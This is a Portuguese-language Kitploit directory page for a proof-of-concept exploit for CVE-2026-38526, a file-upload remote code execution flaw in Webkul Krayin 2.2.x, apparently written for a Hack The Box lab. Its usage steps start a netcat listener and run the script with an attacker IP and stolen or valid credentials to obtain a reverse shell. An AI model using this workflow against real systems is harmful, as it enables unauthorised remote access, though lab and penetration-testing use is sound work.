Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-38526-PoC-htb-nexus — Um script de PoC para CVE-2026-38526, RCE através de uma vulnerabilidade de upload de arquivo no endpoint /admin/tinymce/upload do webkul krayin 2.2.x. | Kitploit
Ferramentas/GitHubGitHub/resolvdd/cve-2026-38526-poc-htb-nexus
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubresolvdd/cve-2026-38526-poc-htb-nexus

CVE-2026-38526-PoC-htb-nexus

Um script de PoC para CVE-2026-38526, RCE através de uma vulnerabilidade de upload de arquivo no endpoint /admin/tinymce/upload do webkul krayin 2.2.x.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 1 mêsAinda não revisado

CVE-2026-38526-PoC-htb-nexus

Um script PoC para CVE-2026-38526, RCE através de uma vulnerabilidade de upload de arquivo no endpoint /admin/tinymce/upload do webkul krayin 2.2.x (construído para htb-nexus)

🛠 Início rápido e Uso

  1. Clone o repositório:
    root@kitploit:~
    git clone https://github.com/Resolvdd/CVE-2026-38526-PoC-htb-nexus.git
    cd CVE-2026-38526-PoC-htb-nexus
    
  2. Crie um ambiente virtual python:
    root@kitploit:~
    python3 -m venv .venv
    source .venv/bin/activate
    
  3. Instale os requirements.txt:
    root@kitploit:~
    pip install -r requirements.txt
    
  4. Inicie o listener:
    root@kitploit:~
    nc -lvnp <port number> (Default: 9001)
    
  5. Execute o script:
    root@kitploit:~
    python3 poc.py -i <your-ip> -p <listener-port-number> -e <valid-krayin-email> -P <valid-krayin-password> -u <url-excluding-protocol Default: http>
    
Baixar ferramenta